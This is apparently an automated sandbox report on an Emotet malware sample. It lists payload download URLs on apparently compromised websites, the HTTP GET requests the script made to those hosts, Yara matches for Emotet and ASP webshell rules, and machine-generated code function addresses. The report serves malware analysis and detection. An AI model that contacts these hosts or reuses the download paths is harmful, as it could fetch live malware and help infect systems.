                  Source: wscript.exe, 0000000A.00000003.392888867.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.392584081.0000000004FB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394237064.0000000004FD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.392354536.0000000004FB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.392777257.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.392625530.0000000004FBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.392754360.0000000004FC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.392789218.0000000004FCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://olgaperezporro.com
                  Source: wscript.exe, 0000000A.00000003.375930591.0000000005A12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.393332313.0000000005A5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.395019547.0000000005A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://olgaperezporro.com/
                  Source: wscript.exe, wscript.exe, 0000000A.00000003.379175657.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388681276.00000000055AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388352589.00000000057EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.393736917.0000000005A1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.384898008.000000000561F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382616382.0000000005541000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387365837.000000000579E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.393578356.0000000005A02000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.389287393.0000000005904000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379710983.0000000005345000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381147538.0000000005534000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.383882868.000000000566D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388670695.000000000576D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.393765942.00000000056CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380261353.00000000054B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379756871.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.376996553.0000000002DB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379986129.00000000053BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381405615.0000000005558000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://olgaperezporro.com/js/ExGBiCZdkkw0GBAuHNZ/
                  Source: wscript.exe, 0000000A.00000003.387365837.000000000579E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.386373392.0000000005794000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.385630751.000000000578C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387429953.00000000057B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394545937.00000000057CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387506954.00000000057C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://olgaperezporro.com/js/ExGBiCZdkkw0GBAuHNZ/6
                  Source: wscript.exe, 0000000A.00000003.387365837.000000000579E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.386373392.0000000005794000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.385630751.000000000578C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387429953.00000000057B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394545937.00000000057CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387506954.00000000057C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://olgaperezporro.com/js/ExGBiCZdkkw0GBAuHNZ/esqu
                  Source: wscript.exe, 0000000A.00000003.392112546.0000000004FDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://olgaperezporro.com/js/ExGBiCZdkkw0GBAuHNZ/vM
                  Source: wscript.exe, wscript.exe, 0000000A.00000002.394746955.00000000058EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379175657.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388681276.00000000055AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388352589.00000000057EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.384898008.000000000561F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382616382.0000000005541000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387365837.000000000579E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.389287393.0000000005904000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379710983.0000000005345000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394765226.0000000005917000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381147538.0000000005534000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.383882868.000000000566D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388670695.000000000576D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.393765942.00000000056CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380261353.00000000054B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379756871.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379986129.00000000053BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381405615.0000000005558000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380405706.000000000545A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://thailandcan.org/assets/ulRa/
                  Source: wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388916629.00000000058A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394717076.00000000058AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://thailandcan.org/assets/ulRa/P
                  Source: unknownDNS traffic detected: queries for: malli.su
                  Source: global trafficHTTP traffic detected: GET /35ccbf2003/jKgk8/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: kts.group
                  Source: global trafficHTTP traffic detected: GET /js/ExGBiCZdkkw0GBAuHNZ/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: olgaperezporro.com
                  Source: unknownHTTPS traffic detected: 31.31.196.93:443 -> 192.168.2.3:49702 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.115.116.248:443 -> 192.168.2.3:49703 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.3:49710 version: TLS 1.2

                  E-Banking Fraud

                  barindex
                  Yara detected Emotet
                  Source: Yara matchFile source: 0000000F.00000002.572181479.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 15.2.regsvr32.exe.2030000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.regsvr32.exe.2030000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.regsvr32.exe.e00000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.regsvr32.exe.e00000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.573776336.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.573888713.0000000002061000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.373814331.0000000000E00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: 0000000A.00000003.386000568.0000000005771000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
                  Source: 0000000A.00000003.393189517.0000000005915000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
                  Source: 0000000A.00000003.393189517.0000000005915000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
                  Source: 0000000A.00000003.385846809.0000000005765000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
                  Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\JMgyzwrCUAZpIA\Jump to behavior
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018002003014_2_0000000180020030
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018004008014_2_0000000180040080
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00000001800202FC14_2_00000001800202FC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00000001800463DC14_2_00000001800463DC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018000845814_2_0000000180008458
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018004848014_2_0000000180048480
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018003C4D014_2_000000018003C4D0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018003A56414_2_000000018003A564
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00000001800205DC14_2_00000001800205DC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018001E8A814_2_000000018001E8A8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018002E90814_2_000000018002E908
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018003C95014_2_000000018003C950
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018003696C14_2_000000018003696C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018002E90814_2_000000018002E908
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0000000180030B2414_2_0000000180030B24
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018001EB2414_2_000000018001EB24
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018003ABF814_2_000000018003ABF8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0000000180042C2C14_2_0000000180042C2C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0000000180036CC814_2_0000000180036CC8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018002ED4414_2_000000018002ED44
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018003ED8C14_2_000000018003ED8C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018001EDB414_2_000000018001EDB4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0000000180030B2414_2_0000000180030B24
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018001F03014_2_000000018001F030
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018003D0E014_2_000000018003D0E0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018001F2AC14_2_000000018001F2AC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018001131414_2_0000000180011314
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018001F53C14_2_000000018001F53C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018001F7B814_2_000000018001F7B8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018001FA8414_2_000000018001FA84
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0000000180041BE414_2_0000000180041BE4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018001FD6414_2_000000018001FD64
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018003BF6014_2_000000018003BF60
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00C0000014_2_00C00000
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261708C14_2_0261708C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260F57814_2_0260F578
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261F5E814_2_0261F5E8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_026015AC14_2_026015AC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02617B3814_2_02617B38
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_026098C814_2_026098C8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0262088014_2_02620880
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261AFF814_2_0261AFF8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02610C0814_2_02610C08
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261526414_2_02615264
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261124414_2_02611244
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260221014_2_02602210
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_026212E814_2_026212E8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0262836814_2_02628368
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261F37014_2_0261F370
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260B37414_2_0260B374
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260A37C14_2_0260A37C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260134C14_2_0260134C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0262234C14_2_0262234C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260932014_2_02609320
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260430814_2_02604308
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261931814_2_02619318
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_026163E414_2_026163E4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_026253EC14_2_026253EC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_026063C014_2_026063C0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260C3DC14_2_0260C3DC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_026273A414_2_026273A4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260838814_2_02608388
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260604014_2_02606040
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260A0C014_2_0260A0C0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_026130CC14_2_026130CC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260D0D414_2_0260D0D4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_026280A814_2_026280A8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0262308C14_2_0262308C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261C09C14_2_0261C09C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0262612C14_2_0262612C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0262510814_2_02625108
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261911C14_2_0261911C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_026231AC14_2_026231AC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261E18414_2_0261E184
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260119414_2_02601194
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260919814_2_02609198
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261866C14_2_0261866C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261767414_2_02617674
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260963414_2_02609634
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260661814_2_02606618
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260A6C414_2_0260A6C4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_026196C814_2_026196C8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_026136D414_2_026136D4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261E68014_2_0261E680
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0262068014_2_02620680
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_026117C414_2_026117C4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_026187D014_2_026187D0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261778814_2_02617788
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261479014_2_02614790
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260B79C14_2_0260B79C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_026204F414_2_026204F4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_026214C414_2_026214C4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_026154A814_2_026154A8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260148014_2_02601480
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260949014_2_02609490
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261449814_2_02614498
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260256414_2_02602564
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0262556414_2_02625564
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261D52414_2_0261D524
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_026115C014_2_026115C0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260A5A014_2_0260A5A0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_026225B014_2_026225B0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260859014_2_02608590
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02625A6814_2_02625A68
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02617A2814_2_02617A28
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261CA2814_2_0261CA28
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02616A0C14_2_02616A0C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260EACC14_2_0260EACC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02625B7414_2_02625B74
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02604B5814_2_02604B58
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261CB5C14_2_0261CB5C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260CB2C14_2_0260CB2C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02624B3814_2_02624B38
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261BB0014_2_0261BB00
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02603BC014_2_02603BC0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02622BD814_2_02622BD8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02623BB814_2_02623BB8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260E84614_2_0260E846
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260C83014_2_0260C830
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0262783814_2_02627838
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_026138D814_2_026138D8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_026018A414_2_026018A4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_026178A814_2_026178A8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260E88814_2_0260E888
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0262188814_2_02621888
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261897014_2_02618970
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260D97C14_2_0260D97C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261094414_2_02610944
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260592014_2_02605920
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261B9E814_2_0261B9E8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_026119CC14_2_026119CC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_026049D814_2_026049D8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261E99014_2_0261E990
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02609E2414_2_02609E24
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02603E0C14_2_02603E0C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261AE1414_2_0261AE14
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261FE1414_2_0261FE14
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02611E1C14_2_02611E1C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261EEE014_2_0261EEE0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02626F6C14_2_02626F6C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02625F7414_2_02625F74
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261FF4014_2_0261FF40
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02606F4414_2_02606F44
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02602F5814_2_02602F58
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02610F5C14_2_02610F5C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02611F3014_2_02611F30
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260CF3414_2_0260CF34
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02627F0014_2_02627F00
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02601FB014_2_02601FB0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02616F8014_2_02616F80
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02601C6014_2_02601C60
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02604C6C14_2_02604C6C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260BC6C14_2_0260BC6C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260BC5E14_2_0260BC5E
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02620C1414_2_02620C14
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02605CF414_2_02605CF4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261ACCC14_2_0261ACCC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261FCD014_2_0261FCD0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02614CD014_2_02614CD0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02628CA014_2_02628CA0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02626C8414_2_02626C84
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260CC9014_2_0260CC90
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02608D6C14_2_02608D6C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02611D4014_2_02611D40
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02619D5014_2_02619D50
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261BD3014_2_0261BD30
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02622D3414_2_02622D34
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02618D3814_2_02618D38
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02613DE014_2_02613DE0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260CDD014_2_0260CDD0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02604D9414_2_02604D94
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0084000015_2_00840000
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02070C0815_2_02070C08
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206F82815_2_0206F828
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206745F15_2_0206745F
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0208088015_2_02080880
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207708C15_2_0207708C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_020698C815_2_020698C8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02077B3815_2_02077B38
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206694715_2_02066947
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02062F5815_2_02062F58
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02085F7415_2_02085F74
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207577815_2_02075778
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_020833B415_2_020833B4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207F5E815_2_0207F5E8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02063E0C15_2_02063E0C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02076A0C15_2_02076A0C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207AE1415_2_0207AE14
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207FE1415_2_0207FE14
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206221015_2_02062210
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02071E1C15_2_02071E1C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02080C1415_2_02080C14
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206661815_2_02066618
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02069E2415_2_02069E24
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02077A2815_2_02077A28
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207CA2815_2_0207CA28
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0208783815_2_02087838
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206963415_2_02069634
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0208823C15_2_0208823C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206C83015_2_0206C830
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206E84615_2_0206E846
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207124415_2_02071244
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206604015_2_02066040
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02085A6815_2_02085A68
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207526415_2_02075264
